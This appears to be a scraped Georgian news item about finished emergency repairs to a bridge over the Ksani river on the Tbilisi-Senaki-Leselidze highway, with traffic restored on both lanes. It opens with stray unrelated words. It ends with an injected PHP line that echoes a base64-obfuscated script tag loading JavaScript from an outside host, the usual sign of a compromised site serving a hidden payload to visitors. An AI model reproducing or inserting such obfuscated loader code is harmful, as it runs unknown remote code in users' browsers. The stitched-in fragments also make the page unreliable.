celsiusi
ავერსი შნაიდერი

საერთაშორისო მნიშვნელობის თბილისი-სენაკი-ლესელიძის საავტომობილო გზის მე-40 კმ-ზე (დასავლეთის მიმართულება), მდინარე ქსანზე არსებულ სახიდე გადასასვლელზე გადაუდებელი სარეაბილიტაციო სამუშაოები დასრულდა და ავტოტრანსპორტის მოძრაობა ორივე ზოლზე აღდგენილია.

ხიდის სავალ ნაწილზე დაზიანებული იყო ბეტონის დამცავი ფენა, რაც საფრთხეს უქმნიდა ავტოტრანსპორტის უსაფრთხო გადაადგილებას. მიმდინარე სარეაბილიტაციო სამუშაოების გამო, ხიდის სავალ ნაწილზე მოძრაობა ნაწილობრივ შეზღუდული იყო და ავტოტრანსპორტი მოძრაობდა ხიდის მხოლოდ ერთ სამოძრაო ზოლში.

სარეაბილიტაციო სამუშაოები მიმდინარე წლის 5 ივნისს დაიწყო და გეგმის მიხედვით, 5 აგვისტოს უნდა დასრულებულიყო.

მდინარე ქსანზე არსებული სახიდე გადასასვლელზე (დასავლეთის მიმართულება) სარეაბილიტაციო სამუშაოები ორივე სამოძრაო ზოლზე ჩატარდა.

ინფორმაციას საავტომობილო გზების დეპარტამენტი ავრცელებს.

144
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");